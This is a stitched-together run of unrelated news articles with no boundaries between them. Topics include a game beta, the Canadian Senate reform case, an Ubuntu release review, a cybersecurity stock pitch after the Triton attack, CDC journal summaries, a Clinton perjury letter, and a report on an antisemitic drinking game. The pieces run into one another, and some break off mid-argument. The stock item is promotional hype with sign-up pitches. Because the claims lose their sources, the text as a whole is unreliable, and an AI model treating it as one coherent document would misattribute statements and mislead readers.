"The war's not over yet. The Battlefield 1 Open Beta will end on Thursday, September 8," the post reads.
"There are still a few days left to try out the Battlefield 1 Open Beta. Get your Squad and head into battle," reads a follow-up tweet.
EA and Battlefield 1 developer DICE had previously kept the end date a secret, telling fans to stay tuned, because they didn't have an "end date just yet".
It's unclear exactly what time the beta will end, although it's already been given a patch to tweak Conquest mode.
The new patch disables the timer in Conquest mode, meaning that matches are decided by reaching a certain number of points, instead of an end time.
"Today's Battlefield 1 Open Beta patch disables the round timer in Conquest Mode. Go capture those points!" reads a Battlefield tweet.
Nobody knows how this one is going to end.
The Supreme Court of Canada will hear arguments starting Tuesday in a historic reference case that Prime Minister Stephen Harper hopes will set one of the country's legislative pillars of government — the Senate — on a course towards election or extinction. (If you are on mobile, you can follow Tonda MacCharles' live coverage here .)
But with all 10 provinces, three territories, two francophone groups and two senators weighing in, chances are pretty good that the cushy Senate will come out looking like a misunderstood cornerstone of Canadian democracy.
Harper has asked the country's top court to decide whether he has the power to unilaterally drive change “aimed at enhancing the legitimacy of the institution” — in the words of his federal lawyers — or whether he needs the assent of provinces, and if so, how many?
Even many bedrock conservatives, such as Alberta's Wildrose party Leader Danielle Smith, conceded last week at the federal Conservative party convention that the Senate has a legitimate purpose: to represent regional interests where an elected government might overlook them.
In an interview with the Star, Smith said: “As an opposition politician who deals with a majority government able to make decisions without any sober second thought, I do have some hope that having a second chamber as oversight to House of Commons decision-making can and should be made to work.”
Smith, like many, just wishes the second chamber were more accountable. In her eyes, an elected, effective Senate would be that.
The case that starts Tuesday and has political and legal eyes riveted has a dry name: “In the Matter of a Reference by the Governor in Council concerning reform of the Senate.”
The stakes couldn't be higher.
Special advocates named by the Supreme Court to provide it with independent advice say the implications go beyond today's debate on Senate reform and will shape future transformations of the Constitution of Canada.
Against a backdrop of political scandal around inflated Senate expenses — several of which landed Harper's own appointees in hot water — the prime minister has asked the high court if the federal government can act alone to require (or allow) provincial elections for senators; if it can act alone to impose term limits (and make them retroactive); if it can repeal the requirement for a senator to own property; and if it can act to abolish the Senate outright.
Or are such changes actually constitutional reforms that require the prime minister to use one of the amending formulas set out in 1982 when Canada repatriated its Constitution from Britain? That's a whole different kettle of fish, one Harper has been determined to avoid.
Quebec's highest appeal court recently ruled on similar questions and said according to the 1982 Constitution Act, term limits and elections amount to constitutional change. They would require the federal government to secure the agreement of seven provinces accounting for 50 per cent of the population. The ruling didn't deal with the question of abolition.
There's only been one change to Senate tenure since the body's formation in 1867. In 1965, Ottawa unilaterally moved to make 75 the mandatory retirement age for senators. Since then, there have been many reform proposals — to establish term limits, renewable terms or an elected Senate — all to no avail.
Guiding principles have been set out once before.
The high court ruled against the federal government's power to take unilateral action in a previous reference case on Senate reform. In 1980, the Supreme Court said the British North America Act did not give “Parliament the power to alter the fundamental character of the Senate by unilateral action.” It said anything that would change the “essential characteristics” of the Senate as a means of “ensuring regional and provincial representation in the federal legislative process” required provincial consent.
Two years later, the Constitution Act of 1982 laid out new constitutional amending procedures, and now it's a whole new ball game.
The provinces disagree among themselves on thresholds for term limits and electoral systems for Senate appointments. Most say such changes would require the general amending formula — the seven-of-10 provinces and 50-per-cent population minimum. Ontario suggests term limits — as long as they are nine years or longer — can be set by Ottawa alone.
And most provinces say abolition is a more drastic and fundamental change that would require unanimous consent of all partners in the federation, as well as the Commons and the Senate. Only Saskatchewan, B.C. and the federal government argue abolition can be achieved with the approval of seven provinces and 50 per cent of the population.
The Conservative government insists it prefers Senate elections over abolition. Pierre Poilievre, the minister charged with democratic reform, touted “democratic bicameralism that would give strong representation to the regions and contribute long-term thinking to the legislative process.”
Poilievre told reporters after Saskatchewan moved to opt for abolition that provinces are free to do as they wish. “Our position remains as is. We want to reform the Senate and abolition is the last resort.”
And yet, on the eve the Supreme Court case, Conservative ministers mused outright about abolition. Harper's minister for small business and tourism, Maxime Bernier, called on Harper to hold a referendum next spring to abolish the Senate.
Amidst it all, the Supreme Court's appointed “friends of the court” — amici curiae — urged the justices not to consider the merits or “political popularity” of any particular reform included in the reference questions, but to examine how the proposals would alter Canada's constitutional architecture and how change should lawfully be made.
The hearing is scheduled for three days, with a decision expected sometime in the next year.
After six months of development the latest version of Ubuntu has been released.
As a ‘Long Term Support' release Ubuntu 12.04 LTS will be backed up fixes and updates for the next five years.
Ubuntu 12.04 = Fast
The ‘P' in the Ubuntu 12.04 codename (“Precise Pangolin”) could just as easily stand for ‘Performance' as it does ‘Precise'.
Speed, once a rod used to beat Unity with, is now arguably its greatest strength; a yardstick by which other desktop environments may start to be measured.
This speed boost feeds into the entire OS feeling brand new. Ubuntu is fast, snappy and responsive. In fact this release is perhaps best representative of the “Unity” vision proposed by Canonical; everything from apps to environment feels cohesive in 12.04. Elements that were, in prior releases, half-finished or cumbersome to use now feel polished and intuitive.
Quicklists, for example, were one ‘feature' of Unity that hadn't been exploited by many of Ubuntu's default apps until now.
Applications
The sluggish Banshee music player has been replaced by Rhythmbox – a change that Lucid-updaters won't notice.This sports the integrated Ubuntu One Music Store for purchasing albums and tracks.
The latest versions of office suite LibreOffice, web-browser Firefox, e-mail client Thunderbird, and Instant Messenger Empathy are all included, with the latter introducing better support for video calling.
The Ubuntu One Control Panel has been revamped, and includes set-up, installation and other options all in one window. It's not the prettiest of apps, but it is functional.
Ubuntu 10.04 upgraders will find an alternative photo-management application installed in the form of Shotwell. It, like Ubuntu One Control Panel, is not the most elegant of apps (something users migrating from a certain fruit-named OS will note) but it does the job well. It even supports exporting of images to Flicke and Facebook.
For Tweets and Facebook addicts the default “social client” (also obtusely referred to as ‘Broadcast' in places) remains the faithful, if not overly appreciated, Gwibber.
Unity
The latest version of Unity boasts more than just performance gains.
There are new lenses, options and minor features for you to play around with – most notably of which is the new ‘App Menu' searching tool ‘HUD'.
The HUD is called by a tap of the ‘Alt' and is able to search entire application menus of the ‘in focus' app – as well as provide swift access to features in the ‘Status Menus' (networking, messaging, etc).
The ‘Home' Lens that previously provided 8 giant shortcuts to applications and folders has been replaced with dynamic ‘activity overview' – showing your most recently used apps, files, etc.
You can control specifically what shows here by adjusting the new Privacy settings available in System Settings.
Don't like the size of the left-hand launcher? You can now quickly and effortlessly resize it via the Appearance pane in System Settings.
It's small, trivial-seeming features like like this that gives Precise its polish.
You wouldn't, for example, instantly notice all of the subtle tweaks to margins, paddings and dividers in the Dash – but subconsciously you do: those small paper-cut sized flaws have been patched over and healed.
Elsewhere you can find an overhauled Unity Greeter, which sports a tweaked UI, new animations, and user-account wallpaper matching.
Look
The default theme of Ubuntu – Ambiance – has been updated, and sports a new ‘unfocused' state to better help you differentiate between active windows and non-active windows.
There are also subtle changes to buttons, widgets, scrollbars, tabs, tooltips and more.
Download
Enough with reading about how it is – you probably want to try it out.
Hit the button below to grab the .iso's whilst they're nice and hot – and be sure to read our list of 10 Things to Do After Installing Ubuntu 12.04 to get some post-install tips.
Download Ubuntu 12.04
On Dec. 14, hackers accidently shut down a critical power plant in the Middle East while attempting to take control of the facility's safety shutdown system.
While the exact location is unknown, it was a first-of-its-kind attack that underscores how critical cybersecurity systems will be for protecting our national security.
The attack is also why we're showing you the three top cybersecurity stocks to watch today, including the best one to add to your portfolio for 2018.
The hack was disclosed last Thursday (Dec. 14) by FireEye Inc. (Nasdaq: FEYE) and reported by Reuters. It was also part of the unstoppable wave of cybercrimes we've seen globally.
You see, global cybercrime damages are expected to reach $6 trillion annually by 2021.
The malware, called "Triton" by FireEye, is only the third computer virus discovered capable of disrupting an industrial infrastructure facility.
According to Reuters, the first virus of this scale, Stuxnet, is believed to have been developed jointly between the United States and Israel to attack Iran's nuclear program in 2010.
More recently, malware known as Industroyer is reportedly responsible for the cyberattack that brought down Ukraine's power grid on Dec. 17, 2016.
FREE PROFIT ALERTS: Get real-time recommendations on the best cybersecurity stock opportunities the moment we release them. Just sign up here, it's completely free…
The frequency of these cyberattacks is just part of the story. These attacks are also becoming much more expensive…
Cybersecurity spending is expected to exceed $1 trillion through 2021, according to Cybersecurity Ventures. That's up from $39.5 billion in 2013, an increase of 532% on an annual basis.
And the top cybersecurity stock on this list is perfectly positioned to grab the biggest slice of that $1 trillion pie…
Top Cybersecurity Stocks to Watch No. 3: Varonis Systems Inc.
Varonis Systems Inc. (Nasdaq: VRNS) provides a software platform for businesses to manage, secure, and migrate their data. The company specializes in storing spreadsheets, word documents, and emails that may contain financial information, intellectual property, or confidential employee information.
Based in Manhattan, Varonis' customers include leading payroll-software company Automatic Data Processing LLC (Nasdaq: ADP), International Business Machines Corp. (NYSE: IBM), and the General Services Administration and U.S. Department of Homeland Security.
Having large corporations and government agencies as customers will be a boon for VRNS shares in 2018. These larger kinds of organizations tend to grow steadily and reliably, which leads to accelerated growth for a small-cap company like Varonis.
For example, Finisar Corp. (Nasdaq: FNSR) stock shot up from $19.30 to $25, for a 29.53% gain, last Wednesday (Dec. 13) on an Apple Inc. (Nasdaq: AAPL) announcement that it was investing $390 million in Finisar.
EXCLUSIVE OPPORTUNITY: The Night Trader makes 226% on one stock, in one day…
Impressively, Varonis Systems has matched or beaten analyst earnings and revenue expectations in 14 out of 15 quarters (since the company's IPO in Q3 2014). So it's no wonder why VRNS shares have climbed 86.33%, from $26.35 to $49.50, over the last 12 months.
Even with its strong performance so far this year, VRNS shares still have room to grow. The 11 firms covering the company have an average price target of $53.73 with a high target of $60, according to S&P Capital IQ. From current levels, this represents near-term upside of 8.5% and 21.21%, respectively.
The next company on this list was visiting the region this attack took place in just two days before it was reported…
Top Cybersecurity Stocks to Watch No. 2: Qualys Inc.
Silicon Valley-based Qualys Inc. (Nasdaq: QLYS) provides cloud-based security software to its customers through its Qualys Cloud Platform. The platform helps its customers both manage and securely store their data.
Last Tuesday (Dec. 12), the largest telecommunications company in the Middle East, Saudi Telecom Com., announced it would integrate the Qualys Cloud Platform into its cloud infrastructure.
Video Hitch a Ride to the 'Drone Revolution' with This Stock
Saudi Telecom aims to help other businesses in Saudi Arabia digitize by providing a central platform through which they can manage and secure their data and operations.
This announcement came only two days before the Triton malware cyberattack shut down a critical power plant in the region. Clearly, Saudi Telecom's initiative couldn't come too soon.
As a result, we expect QLYS shares to perform well in 2018 and beyond as industries in developing regions embrace further digitization.
So far this year, QLYS shares have climbed from $33.05 to $59.20, for a gain of 79.12%.
The company has matched or beaten analysts' earnings expectations in every quarter since it went public in Q3 2012. And Qualys has beaten analysts' revenue expectations in eight of the last 10 quarters.
One analyst has a price target of $70 for shares of Qualys, representing upside of 18.24% from the stock's current levels.
But our top pick secured a $1 billion contract with the largest customer in the world. It's also the best cybersecurity stock to buy now…
Emerging Infectious Diseases Journal
Highlights: Emerging Infectious Diseases, Vol. 20, No. 10, (October 2014)
Disclaimer The articles of interest summarized below will appear in the October 2014 issues of Emerging Infectious Diseases, CDC's monthly peer-reviewed public health journal. This issue will feature emerging pathogens. The articles are embargoed until September 10, 2014, at 12 p.m. EDT. Note: Not all articles published in EID represent work done at CDC. In your stories, please clarify whether a study was conducted by CDC (“a CDC study”) or by another institution (“a study published by CDC”). The opinions expressed by authors contributing to EID do not necessarily reflect the opinions of CDC or the institutions with which the authors are affiliated.
Click here to visit the Emerging Infectious Disease journal page
Marburgvirus Resurgence in Kitaka Mine Bat Population after Extermination Attempts, Uganda, Brian R. Amman et al.
Marburg virus causes a rare but often fatal disease called Marburg hemorrhagic fever. The disease is similar to that caused by the genetically related Ebola virus currently circulating in West Africa. In nature, Marburg virus is carried by a specific species of cave-dwelling fruit bat common throughout sub-Saharan Africa. In these bats, the virus seems to cause no signs of illness, but in humans, infection can be fatal. In 2007, several people working in a mine in Uganda contracted the disease. Soon after, efforts were initiated to rid the mine of bats, and by November 2008, they appeared successful. However, in 2012, another Marburg hemorrhagic fever outbreak occurred in a town near the mine. Upon investigation, it was discovered that the same species of fruit bat had re-inhabited the mine, and genetic testing of the virus linked these bats to the outbreak. Although the number of bats in the cave was substantially lower than it had been in 2008, the prevalence of Marburg virus infection among those bats was substantially higher. The reason for the increase is not clear, but researchers speculate that after the bat extermination attempt, a population of susceptible bats developed over time. Once exposed, levels of Marburg virus infection within the colony quickly increased, and with it the potential for spillover to humans. As other bat species are thought to be the natural source of Ebola virus, avoiding contact with fruit bats in general is one way to prevent these deadly outbreaks.
Contact Dr. Jonathan S. Towner via:
CDC Press Office
404-639-3286
media@cdc.gov
Risk Factors for Human Lice and Bartonellosis among the Homeless, San Francisco, California, USA, Denise L. Bonilla et al.
Body lice are not just an annoyance; they also pose a health risk. One of the diseases that lice can spread is bartonellosis (also called trench fever), and it can lead to life-threatening complications. Homeless people are especially at risk for lice (and thus bartonellosis) because of poor clothing hygiene, lack of resources, exposure to cold weather, and environments that promote transmission of lice (such as crowding). The extent of this risk was more precisely defined by a recent study in San Francisco. Among homeless people who reported itching, 30% had lice; and of lice tested, 16% carried the bartonellosis organism. Risk factors for lice infestation were being male, being African American and sleeping outdoors. Directing prevention information to these populations might help decrease transmission of lice. For example, those who sleep outside might benefit from learning about the importance of clean bedding and how to clean their bedding.
Contact Denise Bonilla via:
California Department of Public Health
Office of Public Affairs
916-440-7259
Rapidly Growing Mycobacteria Associated with Laparoscopic Gastric Banding, Australia, 2005–2011, Hugh L. Wright et al.
Rapidly growing mycobacteria are a type of bacteria that can be found most anywhere in the environment, such as soil, dust, and water. They have been associated with postsurgical infections, especially after cosmetic surgery; some infections are hard to treat. Over the past 6 years in Australia, 18 patients became infected with 2 types of rapidly growing mycobacteria after gastric banding, a weight-reduction procedure that involves a placing a band around the stomach and an access port under the skin. For 10 patients, the primary site of infection was thought to be the port. Among all patients, complications included peritonitis (infection of the lining of the abdomen), band erosion into the stomach, and irritation at the port site. Rapidly growing mycobacteria can occur soon after surgery or a long time later. Treatment consists of appropriate antibiotics and removal of the device. Gastric banding is generally safe and effective; but to prevent postoperative infections, doctors should follow good infection control practices such as thoroughly cleaning instruments and not using tap water (which is not sterile) for medical procedures.
Contact:
Hugh L. Wright
Department of Infectious Diseases, Royal Brisbane and Women's Hospital, Herston, Australia
Hugh.Wright@health.qld.gov.au
Prevalence of Borrelia miyamotoi in Ixodes Ticks in Europe and the United States, Chris D. Crowder et al.
Ticks of the genus Ixodes carrya number of organisms known to cause disease in humans. Among these organisms are Borrelia burgdorferi, the bacteria that cause Lyme disease. It has been recently discovered that another species of Borrelia (called Borrelia miyamotoi) causes a relapsing fever type of disease in humans as well. In the United States, Borrelia miyamotoi has been found anywhere from the Northeast to California and as far south as Tennessee. But knowing where it exists is only a piece of the puzzle; another piece knows how prevalent it in each region. A recent study found that Borrelia miyamotoi is widespread worldwide and that three distinct genetic types exist in North America, Europe, and Japan. Borrelia miyamotoi may be present anywhere that Ixodes ticks reside, but the rate of tick infection varies greatly for each region and location. Information about regional rates of tick infection will help doctors asses exposure risks for their patients and be better prepared to diagnose the illness caused by this organism.
Contact Mark Eshoo via:
Darcy Ross
Diagnostics Public Affairs, Abbott
(224) 667-3655
Darcy.Ross@abbott.com
Knemidocoptic Mange in Wild Golden Eagles, California, USA, Aslı Mete et al.
Knemidocoptidae are mange mites that cause severe skin disease, itching, and sometimes death in birds, especially those that are older, injured, sick, stressed, or malnourished. Outbreaks have occurred among wild birds but not usually among birds of prey except for those in captivity. Thus, finding this type of mange in 3 wild eagles in 1 area of California was unusual. Of these 3 birds, 1 died soon after being found grounded, 1 was rehabilitated, and 1 was euthanized because of the severity of the mange. This euthanized bird had lost feathers, its eyes and ears were crusted over, and its skin was almost half an inch thick in some places. This extent of feather loss and crusting could interfere with a bird's ability to regulate its body temperature and to eat. Although eagles do sometimes get mites, such debilitating disease in otherwise healthy animals and in the wild is highly unusual. Possible causes for these cases of mange include effects of environmental and climate change on bird–mite relationships or emergence of a more pathogenic highly virulent mite. The population of golden eagles in this area of California is notably high, and these cases might reflect habitat changes bringing eagles into closer contact with each other or increasing stress. Researchers will be keeping a close eye on this possibly emerging fatal disease among golden eagles.
Contact:
Aslı Mete
California Animal Health and Food Safety Laboratory (CAHFS)
University of California Davis, Davis, CA
amete@ucdavis.edu
###
U.S. DEPARTMENT OF HEALTH AND HUMAN SERVICES
Two Republican House committee chairman penned a letter Monday to the U.S. Attorney for the District of Columbia. The document outlined the reasons why Democratic presidential nominee Hillary Clinton should be charged with perjury.
In a letter to Channing Phillips, the U.S. Attorney for the District of Columbia, Rep. Jason Chaffetz (R-UT) and Rep. Bob Goodlatte (R-VA) listed four primary reasons why perjury charges are necessary.
Chaffetz chairs the House Committee on Oversight and Government Reform, while Goodlatte runs the Judiciary Committee.
1) Contrary to her sworn testimony, Secretary Clinton sent and received emails that were marked classified at the time.
It was revealed that despite Clinton's claims, she did send classified material on her private email account and server while Secretary of State. Moreover, FBI Director James Comey contradicted previous claims by Clinton that no material was marked because:
“a very small number of the e-mails containing classified information bore markings indicating the presence of classified information.”
Comey later clarified in a congressional testimony that some material was improperly marked classified, such as placing the designation in the body of letters as opposed to the header.
2) Contrary to her sworn testimony, Secretary Clinton's lawyers did not read each email in her personal account to identify all the work-related messages.
Clinton testified that all of her work-related emails were turned over to investigators because through search terms, her attorneys reviewed all emails to sift through personal matters. Clinton said:
“The search terms were everything you could imagine that might be related to anything, but they also went through every single e-mail.”
But that was not the case according to Comey.
In a July 7 testimony before the Oversight Committee, Comey said “it is highly likely” Clinton's search terms missed many key words and phrases.
“The lawyers doing the sorting for Secretary Clinton in 2014 did not individually read the content of all of her e-mails, as we did for those available to us; instead, they relied on header information and used search terms to try to find all work-related e-mails among the reportedly more than 60,000 total e-mails remaining on Secretary Clinton's personal system in 2014.”
3) Contrary to her sworn testimony, Secretary Clinton used several different servers and numerous devices to send and receive work-related emails.
Clinton repeatedly said that she only used one device and one server as a matter of convenience.
Under oath, she said the FBI “has the server that was used during the tenure of my State Department service” when asked by Rep. Jim Jordan (R-Ohio) if there had been only one server, which was in the Bureau's possession.
However, Comey said that the FBI determined Clinton “used multiple devices during her four years as secretary of state.”
4) Contrary to her sworn testimony, Secretary Clinton did not provide all of her work-related email to the Department of Justice.
In a 2015 testimony to the House Select Committee on Benghazi, Clinton said all non personal emails were handed over to investigators:
“…a great deal of meetings, and I provided the department, which has been providing you, with all of my work-related e-mails, all that I had. Approximately 55,000 pages. And they are being publicly released.”
But Comey, in his congressional testimony last month, revealed that a great deal of Clinton's work-related emails were not given to investigators.
“We found work-related emails, thousands, that were not returned,” he said.
The letter from Chaffetz and Goodlatte concludes by stating that the list of sworn statements by Clinton “are incompatible with the FBI's findings,” which they believe should amount to perjury charges.
Photo Credit:
A group of Florida teenagers have devised a local version of the popular college beer pong drinking game. But in contrast to the traditional contest in which two teams gather on opposite sites of a table and try to bounce a ping pong ball into a plastic cup filled with booze, the Florida version has a charming new twist: The groups divide into teams of “Jews” and “Nazis.”
According to an image posted on the Imgur website, “The Nazis start the game off with “blitzkreig”, with each “Aryan” player shooting freely into the “Jewish” cups until one misses. Jews are allowed to designate an “Anne Frank Cup” that can be removed from the table and hidden anywhere in the room. To balance out that unfair advantage, the Nazi team has the right to call “Auschwitz,” meaning one Jewish player is “selected” to sit out.
Advertisement
“Also, throughout the game you are supposed to talk a lot of **** and say as many racist things as possible to make it more enjoyable,” according to the website.
Because US college campuses clearly aren't antisemitic enough as it is.
Westbound lanes on the new Highway 520 bridge are tentatively expected to open April 11 and eastbound lanes are tentatively scheduled to open April 25, state officials announced Tuesday.
The new Highway 520 bridge will open to traffic this spring, with westbound lanes tentatively expected to open April 11 and eastbound lanes tentatively scheduled to open April 25, state officials announced Tuesday.
At 7,710 feet, it will be the longest floating bridge in the world, surpassing by 132 feet the old Highway 520 floating bridge built in 1963.
The gap between opening the westbound and eastbound lanes is because of weekend work that will move barriers and finish other tie-ins between the floating lanes into the old 1963 bridge, which will continue to carry traffic from the Foster Island area to Seattle.
The new crossing provides two general-traffic lanes and a carpool-bus lane in each direction, subject to the same tolls already being charged on the old bridge. There is no carpool-bus lane on the current bridge.
Once the floating bridge is opened to traffic, cars will continue onto the old 1963 bridge just east of Foster Island, until more of the fixed Seattle bridge segment is finished.
That transition point, which narrows westbound from three lanes to two lanes, is likely to cause tricky merges and traffic bottlenecks.
The floating section is part of a nearly $4.6 billion project to replace the old four-lane highway with a six-lane corridor, from I-405 to I-5. Funding has been difficult, but state lawmakers voted last year to fund the final $1.3 billion, to reach the Seattle shore, using part of a new 12-cent gas tax.
The floating section was to open in late 2014, but was delayed, primarily to repair cracks, blamed on design errors by the state, that formed in the four large pontoons as they were built in Grays Harbor.
The bridge has 77 pontoons anchored by 58 cables.
Cost overruns have soared to almost $400 million, including increases for the section where the highway goes on land through the Eastside.
Before traffic gets moving, a party, with a fun run and walk, will be held on the new bridge Saturday, April 2. The next day, there will be a public bicycle ride on the bridge deck from the University of Washington to the Eastside, back into downtown Seattle, and up to the UW campus, organized by Cascade Bicycle Club.
The bridge includes a 14-foot-wide walk-bike trail, along with small viewpoints that extend several feet north, over the lake.
For the public parties, it's worth keeping in mind that the floating bridge can withstand the weight of more than 60,000 people without sinking, said Suanne Pelley, a spokeswoman with the Washington State Department of Transportation. Crowds of that size walked across the second Tacoma Narrows suspension bridge during its grand opening party July 15, 2007, causing the crown to sag 1 foot, about the same as during thick afternoon traffic. More famously, the Golden Gate Bridge flattened in 1987 under the weight of 300,000 people, forcing an emergency decision to close off access.
Work continues on the westbound lanes near the Seattle shore, from Foster Island to Montlake Boulevard. Last week, a new exit ramp opened for drivers entering Seattle to turn south toward the Washington Park Arboretum and the Central Area.
In diplomacy, the subtext is often as important as the text. As the sixth edition of the annual Heart of Asia Conference came to a close on Sunday, between the comments and declarations, the narrative and the counter-narrative, lay the contours of a new, deviatory foreign policy under Prime Minister Narendra Modi.
A nation's strategic affairs are usually the result of well-curated gradualism. Major shifts are rare unless there is a confluence of circumstances and a strong leadership willing to shake off hesitations of history. At the end of the two-day summit, it does appear that India is on the cusp of a bold revision. Two things are immediately clear.
One, India is no longer coy about its relationship with Afghanistan and sees the Central Asian nation as an important pivot. Two, it is fast recalibrating its historic ties with Russia. We are still a long way away from hearing the last word of an enduring strategic partnership but New Delhi is close to accepting (after staying in long denial) that the Cold War-era bonhomie with Moscow is over. Indo-Russian ties, too, have fallen prey to the sweeping currents of realignment triggered by the end of American exceptionalism and the simultaneous rise of China.
Though major regional and global players met in Amritsar ostensibly to guide Afghanistan through its political and economic transition, in reality Heart of Asia platform was reduced to staging just another boxing bout between India, Pakistan and Afghanistan with Russia trying to play the referee and media in Islamabad and New Delhi in breathless anticipation for resumption of talks.
As if that would serve any purpose.
The way the pugilists threw their punches, it became abundantly clear that Kabul and New Delhi now see no point in downplaying the convergence of their strategic and commercial interests. In setting diplomatic niceties aside and blasting Pakistan's complicity in sponsoring terror within its borders and inflicting an "undeclared war", Afghanistan President Ashraf Ghani reflected his growing frustration with a delinquent neighbour. The ferocity of his charge not only laid bare Pakistan's duplicity but also ratified New Delhi's line on cross-border terrorism.
This growing closeness stays true to a trajectory in bilateral relations that saw New Delhi supply Afghanistan with four attack helicopters, the first supply of lethal military hardware to the Afghan National Defense and Security Forces (ANDSF). As a Defenseworld.net article points out, "The first three Mi-24 gunships were delivered in December 2015, before Modi visited Kabul to inaugurate the new Parliament, constructed through India's assistance."
These Russian-made choppers are expected to aid Afghan Air Force in their battle against the Taliban who still occupy 10 percent of territory and is in direct confrontation with Afghan forces for control over another 25 percent of land. Ghani accuses Pakistan of harbouring Taliban masterminds and reiterated before a full house of foreign delegates in Amritsar that were it not been for Islamabad's duplicity, the Taliban wouldn't last even a month.
Quoting a Taliban leader, the Afghanistan President said: “As Kakazada (Mullah Rahmatullah Kakazada), one of the key figures in the Taliban movement, recently said, if they did not have sanctuary in Pakistan, they would not last a month,” according to a report in The Indian Express. In words that leave no space for ambiguity, Ghani rejected Pakistan's $500 million pledge to "rebuild Afghanistan" and asked its foreign affairs advisor Sartaj Aziz to instead use the money to "check extremism" on its soil.
Ghani didn't stop there. According to the report, he accused Pakistan of selectively displacing terror networks in North Waziristan, betraying Afghanistan's trust and inflicting on its soil a war that has grown in intensity during 2016 and has caused the highest number of civilian casualties and military-related deaths in the world.
In contrast, Ghani was effusive in his praise for India. News agency PTI quoted the Afghan President as saying that "India's assistance is transparent and with no strings attached… there are no hidden deals between India and Afghanistan." He also mentioned the "spontaneous celebrations" all over the country following the inauguration of Salma Dam by Modi during his Afghanistan visit and thanked India for further assistance of $1 billion apart from $2 billion.
Though Pakistan has long felt insecure about an India-Afghanistan axis that circumvents it and renders ineffective its geostrategic positioning, Islamabad's obstructionist policies — refusing to let Afghanistan carry on trade with India through its territory — and subversive use of terror have ironically served to catalyse the very thing it dreads. There is now an even greater likelihood — with Modi and Ghani meeting on the sidelines and agreeing on a joint air corridor to bypass Pakistan and enhance bilateral trade — that the relationship will now be taken to the next level.
A commercial-strategic tie-up with Afghanistan — whose unique position as a central Asian country that provides connectivity to several Asian and even European nations — may offer India the chance to counter China's strategic depth through the CPEC.
And in Ghani, Modi has a counterpart who's willing to take India on board. While talking later to Suhasini Haidar of The Hindu during an interview, Ghani said, "India is converging with Afghanistan. There is nothing secret. It is a transparent state to state relationship. We are driven by common goals and opportunities." He even quoted Tagore's Kabuliwala to underline the historic bond between the nations.
But while one historic bond is being revived, another one fell by the wayside. In an extraordinary manouvre that reflected the depths of disparity in which Indo-Russian ties have fallen, Vladimir Putin's envoy Zamir Kabulov rejected India and Afghainstan's criticism of Pakistan and lectured on the need to "avoid scoring brownie points" on multilateral platforms such as these.
Pakistan media expectedly went to town with Kabulov's statements but it became clear where the shoe pinches when a question was posed on the Russia-Pakistan military exercise. “India has close cooperation with the US, does Moscow complain? Then why complain about much lower level of cooperation with Pakistan,” he said.
Foreign affairs are based on narrow self-interests, not foggy sentimentality. It makes sense for Russia, whose relationship with the US is at an all-time low since the Cold War, to migrate to a more Sino-centric axis. That shouldn't discourage India from pursuing its own self-interests. In coming out in the open over its relationship with Afghanistan, Modi has taken the right step.
Firstpost is now on WhatsApp. For the latest analysis, commentary and news updates, sign up for our WhatsApp services. Just go to Firstpost.com/Whatsapp and hit the Subscribe button.
As a coroner says the upset caused by the potential withdrawal of benefits triggered the suicide of Julia Kelly, Channel 4 News looks at the wider impact of benefit changes on vulnerable claimants.
Julia Kelly was in constant pain. After two car accidents and innumerable medical procedures, she was trying to come to terms with the prospect that her spinal condition would be with her for the rest of her life. She founded a charity, Away with Pain, to help others also living with chronic pain.
But in November 2014 the 39-year-old took her own life. Last week a coroner found that “upset caused by the potential withdrawal of her benefits had been the trigger for her to end her life”.
She had received letters asking her to repay some of the benefits she had claimed.
Despite her parents' offers of financial support, her father David told Channel 4 News: “She couldn't see where she was going to go from there, because with the benefits being stopped, she'd got no means of support.”
I feel bitter that we don't have Julia any more. David Kelly, father
Mr Kelly says more should be done for vulnerable claimants to make the system less forbidding: “We could have never cured the pain, but I think the way the letters were sent, the way whole matter was handled by the authorities, could have been treated in a different way.”
A spokesman from the Department for Work and Pensions (DWP) said their thoughts were with Julia's family. But they said employment support allowance, which Julia claimed, was means tested. And if someone has sufficient savings, they may no longer be entitled to it.
Before her death Julia had spoken about the stress of dealing with the benefits system.
In a video she made with the NHS talking about her condition, she said: “Even though I had overwhelming medical evidence, you have to go through tribunals, regarding receiving ESA, and that stress, on top of everything else that you're going through, it's almost enough to make you crack”.
For former Swanscombe town councillor Dave West, the impact of benefit changes was stark: “It means that from being able to live independently, albeit on benefits, to not being able to exist – I was left with roughly £1 a day to live on after I'd paid my bills.
“That was a pound for food, clothes, travel.”
It cost Dave over £3 to get to the doctors.
He is candid about the impact: “I couldn't cope – I knew that I couldn't live like that”. In April 2013, he attempted to take his own life.
Happily, Dave survived. But he is adamant that it was benefit changes that were at the root of his problems: “They just made it impossible for me to live anything like the life I was used to living – which was by no means glamorous.”
At that time Dave says he was working 30-40 hours for nothing as a town councillor, “doing my bit”.
Dave was passed fit to work, whereas he says his doctor said he was not. The introduction of the “bedroom tax” meant he faced moving from the home where he had raised his six children.
In despair at his situation, Dave tried a second time to kill himself. It was difficult not to take it personally, he says: “It was not just what they did, it was they way they did it.”
“Every day you wake up and you think it can't get any worse, and every day a letter lands on the carpet and it does get worse… There was no help.”
In the end, Dave's appeal against the withdrawal of his incapacity benefit was upheld, and the benefit restored.
In a statement, the DWP told Channel 4 News: “Mr West successfully appealed against the decision not to allow his award of incapacity benefit to transfer to an award of employment support allowance in April 2013 and has been in receipt of ESA continuously since.
“If an application is initially denied and further medical evidence is supplied by the claimant at appeal – as happened in this case – the benefit will be awarded and backdated.”
The blasphemy law is “silly, a little embarrassing and needs to be changed,” according to Minister for Health Simon Harris.
Mr Harris also said he would like to see a referendum on the law as soon as possible. “I'd hope to see it sooner rather than later. This is a democracy, and people have the right to express whatever view they do,” he said.
Mr Harris was speaking after a complaint was made to gardaí alleging blasphemy following critical comments about God by British actor, comedian and writer Stephen Fry during an interview with presenter Gay Byrne on RTÉ in February 2015.
A complaint that Mr Fry's comments were in breach of the Defamation Act was made by a man in Ennis Garda station more than two years ago. It is understood that gardaí in Dublin acted on the complaint in recent weeks after the complainant wrote to Garda Commissioner Nóirín O'Sullivan earlier this year to inquire into the status of the investigation.
“Stephen Fry, regardless of your own religious views, clearly he was making a number of points that he felt very strongly about, in his usual witty way,” Mr Harris said.
Earlier on Monday former minister for justice Dermot Ahern said he would have deleted the blasphemy provision from the Constitution if he could, but he was not prepared to hold a referendum on the issue in 2009.
Mr Ahern was speaking after a complaint was made to gardaí alleging blasphemy following critical comments about God by British actor, comedian and writer Stephen Fry during an interview with presenter Gay Byrne on RTÉ in February 2015.
